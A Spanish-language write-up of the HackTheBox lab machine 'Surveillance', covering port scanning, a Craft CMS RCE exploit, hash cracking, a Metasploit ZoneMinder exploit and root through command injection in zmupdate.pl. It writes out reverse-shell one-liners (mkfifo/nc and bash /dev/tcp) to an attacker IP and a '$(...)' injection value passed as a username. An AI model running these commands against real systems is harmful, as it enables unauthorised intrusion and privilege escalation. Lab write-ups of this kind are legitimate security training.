Surveillance es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Media.
En este caso se trata de una máquina basada en el Sistema Operativo Linux.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Surveillance 10.129.178.177 a /etc/hosts como surveillance.htb y comenzamos con el escaneo de puertos nmap.
|
1 2 3 4 5 6 7 8 9 10 11 12 |
$ nmap -sS -p- --open --min-rate 5000 -vvv -n -oA enumeration/nmap1 10.129.178.177 Nmap scan report for 10.129.178.177 Host is up, received reset ttl 63 (0.050s latency). Scanned at 2023-12-09 21:31:36 GMT for 13s Not shown: 64124 closed tcp ports (reset), 1409 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 Read data files from: /usr/bin/../share/nmap # Nmap done at Sat Dec 9 21:31:49 2023 -- 1 IP address (1 host up) scanned in 13.93 seconds |
Una vez detectados los puertos abiertos lanzamos un escaneo más completo sobre los mismos
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
$ nmap -sCV -p 22,80 -oA enumeration/nmap2 10.129.178.177 Nmap scan report for 10.129.178.177 Host is up (0.12s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA) |_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://surveillance.htb/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Dec 9 21:32:13 2023 -- 1 IP address (1 host up) scanned in 12.39 seconds |
Enumeración
Descubiertos los puertos accedemos en primer lugar al portal web en el puerto 80 donde vemos la siguiente página web

Revisamos el portal web pero no vemos gran cosa así que enumeramos directorios y ficheros
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 |
$ feroxbuster -u http://surveillance.htb/ -x txt,php,py,html,pdf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 100 ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.10.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://surveillance.htb/ 🚀 Threads │ 100 📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.10.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [txt, php, py, html, pdf] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 63l 222w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 301 GET 7l 12w 178c http://surveillance.htb/images => http://surveillance.htb/images/ 301 GET 7l 12w 178c http://surveillance.htb/js => http://surveillance.htb/js/ 301 GET 7l 12w 178c http://surveillance.htb/css => http://surveillance.htb/css/ 302 GET 0l 0w 0c http://surveillance.htb/admin => http://surveillance.htb/admin/login 301 GET 7l 12w 178c http://surveillance.htb/img => http://surveillance.htb/img/ 200 GET 109l 602w 50641c http://surveillance.htb/images/s1.png 200 GET 46l 97w 1008c http://surveillance.htb/js/custom.js 200 GET 42l 310w 32876c http://surveillance.htb/images/home.png 200 GET 108l 201w 1870c http://surveillance.htb/css/responsive.css 200 GET 114l 552w 42779c http://surveillance.htb/images/s2.png 200 GET 56l 237w 22629c http://surveillance.htb/images/w3.png 200 GET 89l 964w 72118c http://surveillance.htb/images/hero-bg.png 200 GET 148l 770w 71008c http://surveillance.htb/images/c2.jpg 200 GET 913l 1800w 17439c http://surveillance.htb/css/style.css 200 GET 42l 310w 32876c http://surveillance.htb/images/favicon.png 200 GET 4l 66w 31000c http://surveillance.htb/css/font-awesome.min.css 200 GET 42l 243w 24617c http://surveillance.htb/images/s3.png 200 GET 238l 1140w 90858c http://surveillance.htb/images/c1.jpg 200 GET 2l 1276w 88145c http://surveillance.htb/js/jquery-3.4.1.min.js 302 GET 0l 0w 0c http://surveillance.htb/logout => http://surveillance.htb/ 200 GET 764l 3911w 284781c http://surveillance.htb/images/why-bg.jpg 200 GET 10038l 19587w 192348c http://surveillance.htb/css/bootstrap.css 200 GET 4436l 10973w 136569c http://surveillance.htb/js/bootstrap.js 200 GET 783l 4077w 330169c http://surveillance.htb/images/about-img.png 200 GET 195l 842w 69222c http://surveillance.htb/images/w1.png 200 GET 1518l 8174w 619758c http://surveillance.htb/images/slider-img.png 200 GET 105l 782w 62695c http://surveillance.htb/images/w2.png 200 GET 475l 1185w 16230c http://surveillance.htb/ |
Entre los directorios encontramos vemos una uri interesante, /admin, la cual nos lleva a un formulario de login

En la misma página también podemos ver el software utilizado, siendo este craft cms
Si buscamos un poco en google encontramos una vulnerabilidad de RCE y una poc para la misma.
Descargamos el script y vamos a hacer un par de modificaciones.
En primer lugar quitamos la parte de los proxies, ya que al menos en nuestro caso, no vamos a utilizarlos.
En segundo lugar vamos a modificar la línea siguiente
|
1 |
tmpDir = "/tmp" if upload_tmp_dir == "no value<" else upload_tmp_dir |
Por esta otra
|
1 |
tmpDir = "/tmp" if upload_tmp_dir == "<i>no value</i>" else upload_tmp_dir |
Una vez realizadas las modificaciones necesarias ejecutamos para obtener una shell con www-data
|
1 2 3 4 5 6 7 8 9 10 |
$ python3 CVE-2023-41892.py http://surveillance.htb [-] Get temporary folder and document root ... [-] Write payload to temporary file ... [-] Trigger imagick to write shell ... [-] Done, enjoy the shell $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ whoami www-data $ |
La shell que hemos obtenido es bastante inestable así que vamos a mejorarla con el siguiente comando
|
1 |
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.115 4444 >/tmp/f |
Y tenemos el acceso en nuestra escucha
|
1 2 3 4 5 6 7 8 9 10 11 12 |
$ nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.14.115] from (UNKNOWN) [10.129.178.177] 47080 bash: cannot set terminal process group (969): Inappropriate ioctl for device bash: no job control in this shell www-data@surveillance:~/html/craft/web$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@surveillance:~/html/craft/web$ script /dev/null -c bash script /dev/null -c bash Script started, output log file is '/dev/null'. www-data@surveillance:~/html/craft/web$ |
Escalado al usuario matthew
Después de dar varias vueltas por la máquina encontramos un backup del portal web
|
1 2 3 4 |
www-data@surveillance:~/html/craft/storage/backups$ ls -l ls -l total 20 -rw-r--r-- 1 root root 19918 Oct 17 20:33 surveillance--2023-10-17-202801--v4.4.14.sql.zip |
Se trata de un backup de la base de datos comprimido en formato zip así que extraemos su contenido
|
1 2 3 4 |
www-data@surveillance:~/html/craft/storage/backups$ unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip <ip surveillance--2023-10-17-202801--v4.4.14.sql.zip Archive: surveillance--2023-10-17-202801--v4.4.14.sql.zip inflating: surveillance--2023-10-17-202801--v4.4.14.sql |
Y si buscamos por el mismo tenemos un hash
|
1 2 3 |
www-data@surveillance:~/html/craft/storage/backups$ cat surveillance--2023-10-17-202801--v4.4.14.sql | grep admin|grep Matthew <0-17-202801--v4.4.14.sql | grep admin|grep Matthew INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46'); |
Pasamos el hash por crackstation y tenemos una password

Con la password obtenida accedemos por ssh
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
$ ssh matthew@surveillance.htb matthew@surveillance.htb's password: Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sat Dec 9 10:21:50 PM UTC 2023 System load: 0.0 Processes: 231 Usage of /: 84.7% of 5.91GB Users logged in: 0 Memory usage: 16% IPv4 address for eth0: 10.129.178.177 Swap usage: 0% Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status Last login: Tue Dec 5 12:43:54 2023 from 10.10.14.40 matthew@surveillance:~$ id uid=1000(matthew) gid=1000(matthew) groups=1000(matthew) |
Obteniendo la flag de user
Una vez dentro cogemos la primera flag
|
1 2 3 4 5 6 |
matthew@surveillance:~$ ls -l total 4 -rw-r----- 1 root matthew 33 Dec 9 19:45 user.txt matthew@surveillance:~$ cat user.txt 5f2838e2cdfeb4b5757c580f24b66de5 matthew@surveillance:~$ |
Escalado de privilegios
Enumeramos el sistema y vemos en la configuración de apache un site que no habíamos visto antes
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
matthew@surveillance:~$ cat /etc/nginx/sites-available/zoneminder.conf server { listen 127.0.0.1:8080; root /usr/share/zoneminder/www; index index.php; access_log /var/log/zm/access.log; error_log /var/log/zm/error.log; location / { try_files $uri $uri/ /index.php?$args =404; location ~ /api/(css|img|ico) { rewrite ^/api(.+)$ /api/app/webroot/$1 break; try_files $uri $uri/ =404; } location /api { rewrite ^/api(.+)$ /api/app/webroot/index.php?p=$1 last; } location /cgi-bin { include fastcgi_params; fastcgi_param SCRIPT_FILENAME $request_filename; fastcgi_param HTTP_PROXY ""; fastcgi_pass unix:/run/fcgiwrap.sock; } location ~ \.php$ { include fastcgi_params; fastcgi_param SCRIPT_FILENAME $request_filename; fastcgi_param HTTP_PROXY ""; fastcgi_index index.php; fastcgi_pass unix:/var/run/php/php8.1-fpm-zoneminder.sock; } } } |
Se trata de zoneminder, un software opensource para trabajar con CCTV.
Así que nos mandamos el puerto con chisel
|
1 2 3 4 5 6 7 |
$ ./chisel server --reverse -p 8000 2023/12/09 22:23:47 server: Reverse tunnelling enabled 2023/12/09 22:23:47 server: Fingerprint jUVm+wNeIORhwURTDKfeKo0PUOTx0QTpuGEyK4mLBwo= 2023/12/09 22:23:47 server: Listening on http://0.0.0.0:8000 $ ./chisel client 10.10.14.115:8000 R:8080:127.0.0.1:8080 & |
Y accedemos a través del navegador

Escalado al usuario zoneminder
Si buscamos en google encontramos un exploit a través de los snapshots de la aplicación, así que descargamos el mismo.
Añadimos el mismo a nuestro metasploit y ejecutaremos para obtener la shell
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
msf6 > use exploit/unix/zoneminder_snapshots [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf6 exploit(unix/zoneminder_snapshots) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 msf6 exploit(unix/zoneminder_snapshots) > set rport 8080 rport => 8080 msf6 exploit(unix/zoneminder_snapshots) > set lhost 10.10.14.115 lhost => 10.10.14.115 msf6 exploit(unix/zoneminder_snapshots) > set FETCH_SRVPORT 9000 FETCH_SRVPORT => 9000 msf6 exploit(unix/zoneminder_snapshots) > set targeturi / targeturi => / msf6 exploit(unix/zoneminder_snapshots) > run [*] Started reverse TCP handler on 10.10.14.115:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Elapsed time: 19.095005776000107 seconds. [+] The target is vulnerable. [*] Fetching CSRF Token [+] Got Token: key:9002c3c59e927526c0e40932337a42009eb43726,1702162382 [*] Executing nix Command for cmd/linux/http/x64/meterpreter/reverse_tcp [*] Sending payload [*] Sending stage (3045380 bytes) to 10.129.178.177 [*] Meterpreter session 1 opened (10.10.14.115:4444 -> 10.129.178.177:49958) at 2023-12-09 22:54:01 +0000 [+] Payload sent meterpreter > meterpreter > shell Process 3201 created. Channel 1 created. id uid=1001(zoneminder) gid=1001(zoneminder) groups=1001(zoneminder) whoami zoneminder |
Para hacer más cómoda esta parte, añadimos una clave ssh previamente generada y accedemos por ssh
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
$ ssh -i zoneminder zoneminder@surveillance.htb Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sat Dec 9 10:55:54 PM UTC 2023 System load: 0.02490234375 Processes: 240 Usage of /: 85.0% of 5.91GB Users logged in: 1 Memory usage: 16% IPv4 address for eth0: 10.129.178.177 Swap usage: 0% => There is 1 zombie process. Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. zoneminder@surveillance:~$ id uid=1001(zoneminder) gid=1001(zoneminder) groups=1001(zoneminder) zoneminder@surveillance:~$ |
Escalado al usuario root
Una vez dentro con el usuario zoneminder revisamos los privilegios del usuario
|
1 2 3 4 5 6 |
zoneminder@surveillance:~$ sudo -l Matching Defaults entries for zoneminder on surveillance: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User zoneminder may run the following commands on surveillance: (ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl * |
Y vemos que puede ejecutar como root una serie de scripts
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
zoneminder@surveillance:~$ ls -l /usr/bin/zm* -rwxr-xr-x 1 root root 43027 Nov 23 2022 /usr/bin/zmaudit.pl -rwxr-xr-x 1 root root 731280 Nov 23 2022 /usr/bin/zmc -rwxr-xr-x 1 root root 12939 Nov 23 2022 /usr/bin/zmcamtool.pl -rwxr-xr-x 1 root root 6043 Nov 23 2022 /usr/bin/zmcontrol.pl -rwxr-xr-x 1 root root 26232 Nov 23 2022 /usr/bin/zmdc.pl -rwxr-xr-x 1 root root 35206 Nov 23 2022 /usr/bin/zmfilter.pl -rwxr-xr-x 1 root root 5640 Nov 23 2022 /usr/bin/zmonvif-probe.pl -rwxr-xr-x 1 root root 19386 Nov 23 2022 /usr/bin/zmonvif-trigger.pl -rwxr-xr-x 1 root root 1842 Sep 5 2022 /usr/bin/zmore -rwxr-xr-x 1 root root 13994 Nov 23 2022 /usr/bin/zmpkg.pl -rwxr-xr-x 1 root root 17492 Nov 23 2022 /usr/bin/zmrecover.pl -rwxr-xr-x 1 root root 788096 Nov 23 2022 /usr/bin/zm_rtsp_server -rwxr-xr-x 1 root root 4815 Nov 23 2022 /usr/bin/zmstats.pl -rwxr-xr-x 1 root root 2133 Nov 23 2022 /usr/bin/zmsystemctl.pl -rwxr-xr-x 1 root root 13111 Nov 23 2022 /usr/bin/zmtelemetry.pl -rwxr-xr-x 1 root root 5340 Nov 23 2022 /usr/bin/zmtrack.pl -rwxr-xr-x 1 root root 18482 Nov 23 2022 /usr/bin/zmtrigger.pl -rwxr-xr-x 1 root root 690720 Nov 23 2022 /usr/bin/zmu -rwxr-xr-x 1 root root 45421 Nov 23 2022 /usr/bin/zmupdate.pl -rwxr-xr-x 1 root root 8205 Nov 23 2022 /usr/bin/zmvideo.pl -rwxr-xr-x 1 root root 7022 Nov 23 2022 /usr/bin/zmwatch.pl -rwxr-xr-x 1 root root 19655 Nov 23 2022 /usr/bin/zmx10.pl |
Revisamos en detalle los diferentes scripts y vemos una parte muy interesante en el fichero zmupdate.pl
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
if ( $response =~ /^[yY]$/ ) { my ( $host, $portOrSocket ) = ( $Config{ZM_DB_HOST} =~ /^([^:]+)(?::(.+))?$/ ); my $command = 'mysqldump'; if ($super) { $command .= ' --defaults-file=/etc/mysql/debian.cnf'; } elsif ($dbUser) { $command .= ' -u'.$dbUser; $command .= ' -p\''.$dbPass.'\'' if $dbPass; } if ( defined($portOrSocket) ) { if ( $portOrSocket =~ /^\// ) { $command .= ' -S'.$portOrSocket; } else { $command .= ' -h'.$host.' -P'.$portOrSocket; } } else { $command .= ' -h'.$host; } my $backup = '/tmp/zm/'.$Config{ZM_DB_NAME}.'-'.$version.'.dump'; $command .= ' --add-drop-table --databases '.$Config{ZM_DB_NAME}.' > '.$backup; print("Creating backup to $backup. This may take several minutes.\n"); ($command) = $command =~ /(.*)/; # detaint print("Executing '$command'\n") if logDebugging(); my $output = qx($command); my $status = $? >> 8; if ( $status || logDebugging() ) { chomp( $output ); print( "Output: $output\n" ); } if ( $status ) { die( "Command '$command' exited with status: $status\n" ); } else { print( "Database successfully backed up to $backup, proceeding to upgrade.\n" ); } } elsif ( $response !~ /^[nN]$/ ) { die( "Unexpected response '$response'" ); } } |
El script se utiliza para realizar un backup de la base de datos pero ejecuta el comando con la función qx(), que en otras palabras, es una función standard en perl para la ejecución de comandos del sistema, por lo que puede ser nuestro apoyo para escalar a root.
Hacemos una prueba ejecutando con una versión y usuario diferentes y muestra un error junto con las credenciales utilizadas
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
zoneminder@surveillance:~$ sudo /usr/bin/zmupdate.pl -v 1.36.33 -u sadf Initiating database upgrade to version 1.36.32 from version 1.36.33 WARNING - You have specified an upgrade from version 1.36.33 but the database version found is 1.36.32. Is this correct? Press enter to continue or ctrl-C to abort : Do you wish to take a backup of your database prior to upgrading? This may result in a large file in /tmp/zm if you have a lot of events. Press 'y' for a backup or 'n' to continue : y Creating backup to /tmp/zm/zm-1.36.33.dump. This may take several minutes. mysqldump: Got error: 1698: "Access denied for user 'sadf'@'localhost'" when trying to connect Output: Command 'mysqldump -usadf -p'ZoneMinderPassword2023' -hlocalhost --add-drop-table --databases zm > /tmp/zm/zm-1.36.33.dump' exited with status: 2 |
Así que creamos un script en bash para ejecutar una revshell
|
1 2 3 4 5 |
zoneminder@surveillance:~$ chmod +x /tmp/asdf.sh zoneminder@surveillance:~$ cat /tmp/asdf.sh #!/bin/bash /bin/bash -i >& /dev/tcp/10.10.14.200/4444 0>&1 |
Y ejecutamos de nuevo, pero en este caso, el nombre de usuario será la ejecución de nuestro script
|
1 2 3 4 5 6 7 8 9 10 11 |
zoneminder@surveillance:~$ sudo /usr/bin/zmupdate.pl -v 1.36.33 -u '$(/tmp/asdf.sh)' Initiating database upgrade to version 1.36.32 from version 1.36.33 WARNING - You have specified an upgrade from version 1.36.33 but the database version found is 1.36.32. Is this correct? Press enter to continue or ctrl-C to abort : Do you wish to take a backup of your database prior to upgrading? This may result in a large file in /tmp/zm if you have a lot of events. Press 'y' for a backup or 'n' to continue : y Creating backup to /tmp/zm/zm-1.36.33.dump. This may take several minutes. |
Y tenemos una shell como root
|
1 2 3 4 5 6 |
$ nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.14.200] from (UNKNOWN) [10.129.178.177] 42740 root@surveillance:/home/zoneminder# id id uid=0(root) gid=0(root) groups=0(root) |
Obteniendo la flag de root
Una vez que ya somos root vamos a por la flag
|
1 2 3 4 5 |
root@surveillance:/home/zoneminder# cd /root cd /root root@surveillance:~# cat /root/root.txt cat /root/root.txt 04f3cdb117b1bb4b97ee33a255d97ca4 |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace










